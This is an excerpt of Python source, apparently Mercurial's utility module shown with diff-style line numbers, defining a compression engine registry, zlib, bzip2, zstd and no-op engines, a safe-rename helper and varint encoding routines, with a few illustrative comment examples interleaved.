3266 3295 # Bundle spec human name to engine name.
3267 3296 self._bundlenames = {}
3268 3297 # Internal bundle identifier to engine name.
3269 3298 self._bundletypes = {}
3270 3299 # Revlog header to engine name.
3271 3300 self._revlogheaders = {}
3272 3301 # Wire proto identifier to engine name.
3273 3302 self._wiretypes = {}
3274 3303
3275 3304 def __getitem__(self, key):
3276 3305 return self._engines[key]
3277 3306
3278 3307 def __contains__(self, key):
3279 3308 return key in self._engines
3280 3309
3281 3310 def __iter__(self):
3282 3311 return iter(self._engines.keys())
3283 3312
3284 3313 def register(self, engine):
3285 3314 """Register a compression engine with the manager.
3286 3315
3287 3316 The argument must be a ``compressionengine`` instance.
3288 3317 """
3289 3318 if not isinstance(engine, compressionengine):
3290 3319 raise ValueError(_('argument must be a compressionengine'))
3291 3320
3292 3321 name = engine.name()
3293 3322
3294 3323 if name in self._engines:
3295 3324 raise error.Abort(_('compression engine %s already registered') %
3296 3325 name)
3297 3326
3298 3327 bundleinfo = engine.bundletype()
3299 3328 if bundleinfo:
3300 3329 bundlename, bundletype = bundleinfo
3301 3330
3302 3331 if bundlename in self._bundlenames:
3303 3332 raise error.Abort(_('bundle name %s already registered') %
3304 3333 bundlename)
3305 3334 if bundletype in self._bundletypes:
3306 3335 raise error.Abort(_('bundle type %s already registered by %s') %
3307 3336 (bundletype, self._bundletypes[bundletype]))
3308 3337
3309 3338 # The external-facing bundle name is optional; only register it if set.
3310 3339 if bundlename:
3311 3340 self._bundlenames[bundlename] = name
3312 3341
3313 3342 self._bundletypes[bundletype] = name
3314 3343
3315 3344 wiresupport = engine.wireprotosupport()
3316 3345 if wiresupport:
3317 3346 wiretype = wiresupport.name
3318 3347 if wiretype in self._wiretypes:
3319 3348 raise error.Abort(_('wire protocol compression %s already '
3320 3349 'registered by %s') %
3321 3350 (wiretype, self._wiretypes[wiretype]))
3322 3351
3323 3352 self._wiretypes[wiretype] = name
3324 3353
3325 3354 revlogheader = engine.revlogheader()
3326 3355 if revlogheader and revlogheader in self._revlogheaders:
3327 3356 raise error.Abort(_('revlog header %s already registered by %s') %
3328 3357 (revlogheader, self._revlogheaders[revlogheader]))
3329 3358
3330 3359 if revlogheader:
3331 3360 self._revlogheaders[revlogheader] = name
3332 3361
3333 3362 self._engines[name] = engine
3334 3363
3335 3364 @property
3336 3365 def supportedbundlenames(self):
3337 3366 return set(self._bundlenames.keys())
3338 3367
3339 3368 @property
3340 3369 def supportedbundletypes(self):
3341 3370 return set(self._bundletypes.keys())
3342 3371
3343 3372 def forbundlename(self, bundlename):
3344 3373 """Obtain a compression engine registered to a bundle name.
3345 3374
3346 3375 Will raise KeyError if the bundle type isn't registered.
3347 3376
3348 3377 Will abort if the engine is known but not available.
3349 3378 """
3350 3379 engine = self._engines[self._bundlenames[bundlename]]
3351 3380 if not engine.available():
3352 3381 raise error.Abort(_('compression engine %s could not be loaded') %
3353 3382 engine.name())
3354 3383 return engine
3355 3384
3356 3385 def forbundletype(self, bundletype):
3357 3386 """Obtain a compression engine registered to a bundle type.
3358 3387
3359 3388 Will raise KeyError if the bundle type isn't registered.
3360 3389
3361 3390 Will abort if the engine is known but not available.
3362 3391 """
3363 3392 engine = self._engines[self._bundletypes[bundletype]]
3364 3393 if not engine.available():
3365 3394 raise error.Abort(_('compression engine %s could not be loaded') %
3366 3395 engine.name())
3367 3396 return engine
3368 3397
3369 3398 def supportedwireengines(self, role, onlyavailable=True):
3370 3399 """Obtain compression engines that support the wire protocol.
3371 3400
3372 3401 Returns a list of engines in prioritized order, most desired first.
3373 3402
3374 3403 If ``onlyavailable`` is set, filter out engines that can't be
3375 3404 loaded.
3376 3405 """
3377 3406 assert role in (SERVERROLE, CLIENTROLE)
3378 3407
3379 3408 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3380 3409
3381 3410 engines = [self._engines[e] for e in self._wiretypes.values()]
3382 3411 if onlyavailable:
3383 3412 engines = [e for e in engines if e.available()]
3384 3413
3385 3414 def getkey(e):
3386 3415 # Sort first by priority, highest first. In case of tie, sort
3387 3416 # alphabetically. This is arbitrary, but ensures output is
3388 3417 # stable.
3389 3418 w = e.wireprotosupport()
3390 3419 return -1 * getattr(w, attr), w.name
3391 3420
3392 3421 return sorted(engines, key=getkey)
3393 3422
3394 3423 def forwiretype(self, wiretype):
3395 3424 engine = self._engines[self._wiretypes[wiretype]]
3396 3425 if not engine.available():
3397 3426 raise error.Abort(_('compression engine %s could not be loaded') %
3398 3427 engine.name())
3399 3428 return engine
3400 3429
3401 3430 def forrevlogheader(self, header):
3402 3431 """Obtain a compression engine registered to a revlog header.
3403 3432
3404 3433 Will raise KeyError if the revlog header value isn't registered.
3405 3434 """
3406 3435 return self._engines[self._revlogheaders[header]]
3407 3436
3408 3437 compengines = compressormanager()
3409 3438
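# Illustrative lookup sketch, not part of the original module; once the
# engines defined below have registered themselves, a caller might do:
#
#   engine = compengines.forbundlename('gzip')
#   compressed = b''.join(engine.compressstream(iter([b'some data'])))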
3410 3439 class compressionengine(object):
3411 3440 """Base class for compression engines.
3412 3441
3413 3442 Compression engines must implement the interface defined by this class.
3414 3443 """
3415 3444 def name(self):
3416 3445 """Returns the name of the compression engine.
3417 3446
3418 3447 This is the key the engine is registered under.
3419 3448
3420 3449 This method must be implemented.
3421 3450 """
3422 3451 raise NotImplementedError()
3423 3452
3424 3453 def available(self):
3425 3454 """Whether the compression engine is available.
3426 3455
3427 3456 The intent of this method is to allow optional compression engines
3428 3457 that may not be available in all installations (such as engines relying
3429 3458 on C extensions that may not be present).
3430 3459 """
3431 3460 return True
3432 3461
3433 3462 def bundletype(self):
3434 3463 """Describes bundle identifiers for this engine.
3435 3464
3436 3465 If this compression engine isn't supported for bundles, returns None.
3437 3466
3438 3467 If this engine can be used for bundles, returns a 2-tuple of strings of
3439 3468 the user-facing "bundle spec" compression name and an internal
3440 3469 identifier used to denote the compression format within bundles. To
3441 3470 exclude the name from external usage, set the first element to ``None``.
3442 3471
3443 3472 If bundle compression is supported, the class must also implement
3444 3473 ``compressstream`` and ``decompressorreader``.
3445 3474
3446 3475 The docstring of this method is used in the help system to tell users
3447 3476 about this engine.
3448 3477 """
3449 3478 return None
3450 3479
3451 3480 def wireprotosupport(self):
3452 3481 """Declare support for this compression format on the wire protocol.
3453 3482
3454 3483 If this compression engine isn't supported for compressing wire
3455 3484 protocol payloads, returns None.
3456 3485
3457 3486 Otherwise, returns ``compenginewireprotosupport`` with the following
3458 3487 fields:
3459 3488
3460 3489 * String format identifier
3461 3490 * Integer priority for the server
3462 3491 * Integer priority for the client
3463 3492
3464 3493 The integer priorities are used to order the advertisement of format
3465 3494 support by server and client. The highest integer is advertised
3466 3495 first. Integers with non-positive values aren't advertised.
3467 3496
3468 3497 The priority values are somewhat arbitrary and only used for default
3469 3498 ordering. The relative order can be changed via config options.
3470 3499
3471 3500 If wire protocol compression is supported, the class must also implement
3472 3501 ``compressstream`` and ``decompressorreader``.
3473 3502 """
3474 3503 return None
3475 3504
3476 3505 def revlogheader(self):
3477 3506 """Header added to revlog chunks that identifies this engine.
3478 3507
3479 3508 If this engine can be used to compress revlogs, this method should
3480 3509 return the bytes used to identify chunks compressed with this engine.
3481 3510 Else, the method should return ``None`` to indicate it does not
3482 3511 participate in revlog compression.
3483 3512 """
3484 3513 return None
3485 3514
3486 3515 def compressstream(self, it, opts=None):
3487 3516 """Compress an iterator of chunks.
3488 3517
3489 3518 The method receives an iterator (ideally a generator) of chunks of
3490 3519 bytes to be compressed. It returns an iterator (ideally a generator)
3491 3520 of chunks of bytes representing the compressed output.
3492 3521
3493 3522 Optionally accepts an argument defining how to perform compression.
3494 3523 Each engine treats this argument differently.
3495 3524 """
3496 3525 raise NotImplementedError()
3497 3526
3498 3527 def decompressorreader(self, fh):
3499 3528 """Perform decompression on a file object.
3500 3529
3501 3530 Argument is an object with a ``read(size)`` method that returns
3502 3531 compressed data. Return value is an object with a ``read(size)`` method
3503 3532 that returns uncompressed data.
3504 3533 """
3505 3534 raise NotImplementedError()
3506 3535
3507 3536 def revlogcompressor(self, opts=None):
3508 3537 """Obtain an object that can be used to compress revlog entries.
3509 3538
3510 3539 The object has a ``compress(data)`` method that compresses binary
3511 3540 data. This method returns compressed binary data or ``None`` if
3512 3541 the data could not be compressed (too small, not compressible, etc).
3513 3542 The returned data should have a header uniquely identifying this
3514 3543 compression format so decompression can be routed to this engine.
3515 3544 This header should be identified by the ``revlogheader()`` return
3516 3545 value.
3517 3546
3518 3547 The object has a ``decompress(data)`` method that decompresses
3519 3548 data. The method will only be called if ``data`` begins with
3520 3549 ``revlogheader()``. The method should return the raw, uncompressed
3521 3550 data or raise a ``RevlogError``.
3522 3551
3523 3552 The object is reusable but is not thread safe.
3524 3553 """
3525 3554 raise NotImplementedError()
3526 3555
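# Illustrative sketch, not part of the original module, of how an extension
# might plug in an engine; the 'lzma' engine below is hypothetical and
# deliberately minimal (no wire protocol or revlog support):
#
#   class _lzmaengine(compressionengine):
#       def name(self):
#           return 'lzma'
#
#       def bundletype(self):
#           """Hypothetical LZMA example engine."""
#           return 'lzma', 'LZ'
#
#       def compressstream(self, it, opts=None):
#           import lzma
#           z = lzma.LZMACompressor()
#           for chunk in it:
#               data = z.compress(chunk)
#               if data:
#                   yield data
#           yield z.flush()
#
#       def decompressorreader(self, fh):
#           import lzma
#           d = lzma.LZMADecompressor()
#           return chunkbuffer(d.decompress(chunk)
#                              for chunk in filechunkiter(fh))
#
#   compengines.register(_lzmaengine())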
3527 3556 class _zlibengine(compressionengine):
3528 3557 def name(self):
3529 3558 return 'zlib'
3530 3559
3531 3560 def bundletype(self):
3532 3561 """zlib compression using the DEFLATE algorithm.
3533 3562
3534 3563 All Mercurial clients should support this format. The compression
3535 3564 algorithm strikes a reasonable balance between compression ratio
3536 3565 and size.
3537 3566 """
3538 3567 return 'gzip', 'GZ'
3539 3568
3540 3569 def wireprotosupport(self):
3541 3570 return compewireprotosupport('zlib', 20, 20)
3542 3571
3543 3572 def revlogheader(self):
3544 3573 return 'x'
3545 3574
3546 3575 def compressstream(self, it, opts=None):
3547 3576 opts = opts or {}
3548 3577
3549 3578 z = zlib.compressobj(opts.get('level', -1))
3550 3579 for chunk in it:
3551 3580 data = z.compress(chunk)
3552 3581 # Not all calls to compress emit data. It is cheaper to inspect
3553 3582 # here than to feed empty chunks through generator.
3554 3583 if data:
3555 3584 yield data
3556 3585
3557 3586 yield z.flush()
3558 3587
3559 3588 def decompressorreader(self, fh):
3560 3589 def gen():
3561 3590 d = zlib.decompressobj()
3562 3591 for chunk in filechunkiter(fh):
3563 3592 while chunk:
3564 3593 # Limit output size to limit memory.
3565 3594 yield d.decompress(chunk, 2 ** 18)
3566 3595 chunk = d.unconsumed_tail
3567 3596
3568 3597 return chunkbuffer(gen())
3569 3598
3570 3599 class zlibrevlogcompressor(object):
3571 3600 def compress(self, data):
3572 3601 insize = len(data)
3573 3602 # Caller handles empty input case.
3574 3603 assert insize > 0
3575 3604
3576 3605 if insize < 44:
3577 3606 return None
3578 3607
3579 3608 elif insize <= 1000000:
3580 3609 compressed = zlib.compress(data)
3581 3610 if len(compressed) < insize:
3582 3611 return compressed
3583 3612 return None
3584 3613
3585 3614 # zlib makes an internal copy of the input buffer, doubling
3586 3615 # memory usage for large inputs. So do streaming compression
3587 3616 # on large inputs.
3588 3617 else:
3589 3618 z = zlib.compressobj()
3590 3619 parts = []
3591 3620 pos = 0
3592 3621 while pos < insize:
3593 3622 pos2 = pos + 2**20
3594 3623 parts.append(z.compress(data[pos:pos2]))
3595 3624 pos = pos2
3596 3625 parts.append(z.flush())
3597 3626
3598 3627 if sum(map(len, parts)) < insize:
3599 3628 return ''.join(parts)
3600 3629 return None
3601 3630
3602 3631 def decompress(self, data):
3603 3632 try:
3604 3633 return zlib.decompress(data)
3605 3634 except zlib.error as e:
3606 3635 raise error.RevlogError(_('revlog decompress error: %s') %
3607 3636 str(e))
3608 3637
3609 3638 def revlogcompressor(self, opts=None):
3610 3639 return self.zlibrevlogcompressor()
3611 3640
3612 3641 compengines.register(_zlibengine())
3613 3642
3614 3643 class _bz2engine(compressionengine):
3615 3644 def name(self):
3616 3645 return 'bz2'
3617 3646
3618 3647 def bundletype(self):
3619 3648 """An algorithm that produces smaller bundles than ``gzip``.
3620 3649
3621 3650 All Mercurial clients should support this format.
3622 3651
3623 3652 This engine will likely produce smaller bundles than ``gzip`` but
3624 3653 will be significantly slower, both during compression and
3625 3654 decompression.
3626 3655
3627 3656 If available, the ``zstd`` engine can yield similar or better
3628 3657 compression at much higher speeds.
3629 3658 """
3630 3659 return 'bzip2', 'BZ'
3631 3660
3632 3661 # We declare a protocol name but don't advertise by default because
3633 3662 # it is slow.
3634 3663 def wireprotosupport(self):
3635 3664 return compewireprotosupport('bzip2', 0, 0)
3636 3665
3637 3666 def compressstream(self, it, opts=None):
3638 3667 opts = opts or {}
3639 3668 z = bz2.BZ2Compressor(opts.get('level', 9))
3640 3669 for chunk in it:
3641 3670 data = z.compress(chunk)
3642 3671 if data:
3643 3672 yield data
3644 3673
3645 3674 yield z.flush()
3646 3675
3647 3676 def decompressorreader(self, fh):
3648 3677 def gen():
3649 3678 d = bz2.BZ2Decompressor()
3650 3679 for chunk in filechunkiter(fh):
3651 3680 yield d.decompress(chunk)
3652 3681
3653 3682 return chunkbuffer(gen())
3654 3683
3655 3684 compengines.register(_bz2engine())
3656 3685
3657 3686 class _truncatedbz2engine(compressionengine):
3658 3687 def name(self):
3659 3688 return 'bz2truncated'
3660 3689
3661 3690 def bundletype(self):
3662 3691 return None, '_truncatedBZ'
3663 3692
3664 3693 # We don't implement compressstream because it is hackily handled elsewhere.
3665 3694
3666 3695 def decompressorreader(self, fh):
3667 3696 def gen():
3668 3697 # The input stream doesn't have the 'BZ' header. So add it back.
3669 3698 d = bz2.BZ2Decompressor()
3670 3699 d.decompress('BZ')
3671 3700 for chunk in filechunkiter(fh):
3672 3701 yield d.decompress(chunk)
3673 3702
3674 3703 return chunkbuffer(gen())
3675 3704
3676 3705 compengines.register(_truncatedbz2engine())
3677 3706
3678 3707 class _noopengine(compressionengine):
3679 3708 def name(self):
3680 3709 return 'none'
3681 3710
3682 3711 def bundletype(self):
3683 3712 """No compression is performed.
3684 3713
3685 3714 Use this compression engine to explicitly disable compression.
3686 3715 """
3687 3716 return 'none', 'UN'
3688 3717
3689 3718 # Clients always support uncompressed payloads. Servers don't advertise
3690 3719 # them because, unless you are on a fast network, uncompressed payloads
3691 3720 # can easily saturate your network pipe.
3692 3721 def wireprotosupport(self):
3693 3722 return compewireprotosupport('none', 0, 10)
3694 3723
3695 3724 # We don't implement revlogheader because it is handled specially
3696 3725 # in the revlog class.
3697 3726
3698 3727 def compressstream(self, it, opts=None):
3699 3728 return it
3700 3729
3701 3730 def decompressorreader(self, fh):
3702 3731 return fh
3703 3732
3704 3733 class nooprevlogcompressor(object):
3705 3734 def compress(self, data):
3706 3735 return None
3707 3736
3708 3737 def revlogcompressor(self, opts=None):
3709 3738 return self.nooprevlogcompressor()
3710 3739
3711 3740 compengines.register(_noopengine())
3712 3741
3713 3742 class _zstdengine(compressionengine):
3714 3743 def name(self):
3715 3744 return 'zstd'
3716 3745
3717 3746 @propertycache
3718 3747 def _module(self):
3719 3748 # Not all installs have the zstd module available. So defer importing
3720 3749 # until first access.
3721 3750 try:
3722 3751 from . import zstd
3723 3752 # Force delayed import.
3724 3753 zstd.__version__
3725 3754 return zstd
3726 3755 except ImportError:
3727 3756 return None
3728 3757
3729 3758 def available(self):
3730 3759 return bool(self._module)
3731 3760
3732 3761 def bundletype(self):
3733 3762 """A modern compression algorithm that is fast and highly flexible.
3734 3763
3735 3764 Only supported by Mercurial 4.1 and newer clients.
3736 3765
3737 3766 With the default settings, zstd compression is both faster and yields
3738 3767 better compression than ``gzip``. It also frequently yields better
3739 3768 compression than ``bzip2`` while operating at much higher speeds.
3740 3769
3741 3770 If this engine is available and backwards compatibility is not a
3742 3771 concern, it is likely the best available engine.
3743 3772 """
3744 3773 return 'zstd', 'ZS'
3745 3774
3746 3775 def wireprotosupport(self):
3747 3776 return compewireprotosupport('zstd', 50, 50)
3748 3777
3749 3778 def revlogheader(self):
3750 3779 return '\x28'
3751 3780
3752 3781 def compressstream(self, it, opts=None):
3753 3782 opts = opts or {}
3754 3783 # zstd level 3 is almost always significantly faster than zlib
3755 3784 # while providing no worse compression. It strikes a good balance
3756 3785 # between speed and compression.
3757 3786 level = opts.get('level', 3)
3758 3787
3759 3788 zstd = self._module
3760 3789 z = zstd.ZstdCompressor(level=level).compressobj()
3761 3790 for chunk in it:
3762 3791 data = z.compress(chunk)
3763 3792 if data:
3764 3793 yield data
3765 3794
3766 3795 yield z.flush()
3767 3796
3768 3797 def decompressorreader(self, fh):
3769 3798 zstd = self._module
3770 3799 dctx = zstd.ZstdDecompressor()
3771 3800 return chunkbuffer(dctx.read_from(fh))
3772 3801
3773 3802 class zstdrevlogcompressor(object):
3774 3803 def __init__(self, zstd, level=3):
3775 3804 # Writing the content size adds a few bytes to the output. However,
3776 3805 # it allows decompression to be more optimal since we can
3777 3806 # pre-allocate a buffer to hold the result.
3778 3807 self._cctx = zstd.ZstdCompressor(level=level,
3779 3808 write_content_size=True)
3780 3809 self._dctx = zstd.ZstdDecompressor()
3781 3810 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3782 3811 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3783 3812
3784 3813 def compress(self, data):
3785 3814 insize = len(data)
3786 3815 # Caller handles empty input case.
3787 3816 assert insize > 0
3788 3817
3789 3818 if insize < 50:
3790 3819 return None
3791 3820
3792 3821 elif insize <= 1000000:
3793 3822 compressed = self._cctx.compress(data)
3794 3823 if len(compressed) < insize:
3795 3824 return compressed
3796 3825 return None
3797 3826 else:
3798 3827 z = self._cctx.compressobj()
3799 3828 chunks = []
3800 3829 pos = 0
3801 3830 while pos < insize:
3802 3831 pos2 = pos + self._compinsize
3803 3832 chunk = z.compress(data[pos:pos2])
3804 3833 if chunk:
3805 3834 chunks.append(chunk)
3806 3835 pos = pos2
3807 3836 chunks.append(z.flush())
3808 3837
3809 3838 if sum(map(len, chunks)) < insize:
3810 3839 return ''.join(chunks)
3811 3840 return None
3812 3841
3813 3842 def decompress(self, data):
3814 3843 insize = len(data)
3815 3844
3816 3845 try:
3817 3846 # This was measured to be faster than other streaming
3818 3847 # decompressors.
3819 3848 dobj = self._dctx.decompressobj()
3820 3849 chunks = []
3821 3850 pos = 0
3822 3851 while pos < insize:
3823 3852 pos2 = pos + self._decompinsize
3824 3853 chunk = dobj.decompress(data[pos:pos2])
3825 3854 if chunk:
3826 3855 chunks.append(chunk)
3827 3856 pos = pos2
3828 3857 # Frame should be exhausted, so no finish() API.
3829 3858
3830 3859 return ''.join(chunks)
3831 3860 except Exception as e:
3832 3861 raise error.RevlogError(_('revlog decompress error: %s') %
3833 3862 str(e))
3834 3863
3835 3864 def revlogcompressor(self, opts=None):
3836 3865 opts = opts or {}
3837 3866 return self.zstdrevlogcompressor(self._module,
3838 3867 level=opts.get('level', 3))
3839 3868
3840 3869 compengines.register(_zstdengine())
3841 3870
3842 3871 def bundlecompressiontopics():
3843 3872 """Obtains a list of available bundle compressions for use in help."""
3844 3873 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3845 3874 items = {}
3846 3875
3847 3876 # We need to format the docstring. So use a dummy object/type to hold it
3848 3877 # rather than mutating the original.
3849 3878 class docobject(object):
3850 3879 pass
3851 3880
3852 3881 for name in compengines:
3853 3882 engine = compengines[name]
3854 3883
3855 3884 if not engine.available():
3856 3885 continue
3857 3886
3858 3887 bt = engine.bundletype()
3859 3888 if not bt or not bt[0]:
3860 3889 continue
3861 3890
3862 3891 doc = pycompat.sysstr('``%s``\n %s') % (
3863 3892 bt[0], engine.bundletype.__doc__)
3864 3893
3865 3894 value = docobject()
3866 3895 value.__doc__ = doc
3867 3896 value._origdoc = engine.bundletype.__doc__
3868 3897 value._origfunc = engine.bundletype
3869 3898
3870 3899 items[bt[0]] = value
3871 3900
3872 3901 return items
3873 3902
3874 3903 i18nfunctions = bundlecompressiontopics().values()
3875 3904
3876 3905 # convenient shortcut
3877 3906 dst = debugstacktrace
3878 3907
3879 3908 def safename(f, tag, ctx, others=None):
3880 3909 """
3881 3910 Generate a name that is safe to rename f to in the given context.
3882 3911
3883 3912 f: filename to rename
3884 3913 tag: a string tag that will be included in the new name
3885 3914 ctx: a context, in which the new name must not exist
3886 3915 others: a set of other filenames that the new name must not be in
3887 3916
3888 3917 Returns a file name of the form oldname~tag[~number] which does not exist
3889 3918 in the provided context and is not in the set of other names.
3890 3919 """
3891 3920 if others is None:
3892 3921 others = set()
3893 3922
3894 3923 fn = '%s~%s' % (f, tag)
3895 3924 if fn not in ctx and fn not in others:
3896 3925 return fn
3897 3926 for n in itertools.count(1):
3898 3927 fn = '%s~%s~%s' % (f, tag, n)
3899 3928 if fn not in ctx and fn not in others:
3900 3929 return fn
3901 3930
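# Illustrative sketch, not from the original source, assuming a ctx that
# contains neither candidate name:
#
#   >>> safename('foo', 'merge', ctx)
#   'foo~merge'
#   >>> safename('foo', 'merge', ctx, others={'foo~merge'})
#   'foo~merge~1'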
3902 3931 def readexactly(stream, n):
3903 3932 '''read n bytes from stream.read and abort if less was available'''
3904 3933 s = stream.read(n)
3905 3934 if len(s) < n:
3906 3935 raise error.Abort(_("stream ended unexpectedly"
3907 3936 " (got %d bytes, expected %d)")
3908 3937 % (len(s), n))
3909 3938 return s
3910 3939
3911 3940 def uvarintencode(value):
3912 3941 """Encode an unsigned integer value to a varint.
3913 3942
3914 3943 A varint is a variable length integer of 1 or more bytes. Each byte
3915 3944 except the last has the most significant bit set. The lower 7 bits of
3916 3945 each byte store the value's binary representation, least significant
3917 3946 group first.
3918 3947
3919 3948 >>> uvarintencode(0)
3920 3949 '\\x00'
3921 3950 >>> uvarintencode(1)
3922 3951 '\\x01'
3923 3952 >>> uvarintencode(127)
3924 3953 '\\x7f'
3925 3954 >>> uvarintencode(1337)
3926 3955 '\\xb9\\n'
3927 3956 >>> uvarintencode(65536)
3928 3957 '\\x80\\x80\\x04'
3929 3958 >>> uvarintencode(-1)
3930 3959 Traceback (most recent call last):
3931 3960 ...
3932 3961 ProgrammingError: negative value for uvarint: -1
3933 3962 """
3934 3963 if value < 0:
3935 3964 raise error.ProgrammingError('negative value for uvarint: %d'
3936 3965 % value)
3937 3966 bits = value & 0x7f
3938 3967 value >>= 7
3939 3968 buf = []
3940 3969 while value:
3941 3970 buf.append(pycompat.bytechr(0x80 | bits))
3942 3971 bits = value & 0x7f
3943 3972 value >>= 7
3944 3973 buf.append(pycompat.bytechr(bits))
3945 3974
3946 3975 return ''.join(buf)
3947 3976
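# Worked example (illustrative, not from the original source): 1337 is
# 0b10100111001; split from the least significant end into 7-bit groups it
# is 0111001 (0x39) then 0001010 (0x0a). The low group is emitted first with
# the continuation bit set (0x80 | 0x39 == 0xb9) and the high group last
# without it, giving b'\xb9\n' as in the doctest above.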
3948 3977 def uvarintdecodestream(fh):
3949 3978 """Decode an unsigned variable length integer from a stream.
3950 3979
3951 3980 The passed argument is anything that has a ``.read(N)`` method.
3952 3981
3953 3982 >>> try:
3954 3983 ... from StringIO import StringIO as BytesIO
3955 3984 ... except ImportError:
3956 3985 ... from io import BytesIO
3957 3986 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3958 3987 0
3959 3988 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3960 3989 1
3961 3990 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3962 3991 127
3963 3992 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3964 3993 1337
3965 3994 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3966 3995 65536
3967 3996 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3968 3997 Traceback (most recent call last):
3969 3998 ...
3970 3999 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3971 4000 """
3972 4001 result = 0
3973 4002 shift = 0
3974 4003 while True:
3975 4004 byte = ord(readexactly(fh, 1))
3976 4005 result |= ((byte & 0x7f) << shift)
3977 4006 if not (byte & 0x80):
3978 4007 return result
3979 4008 shift += 7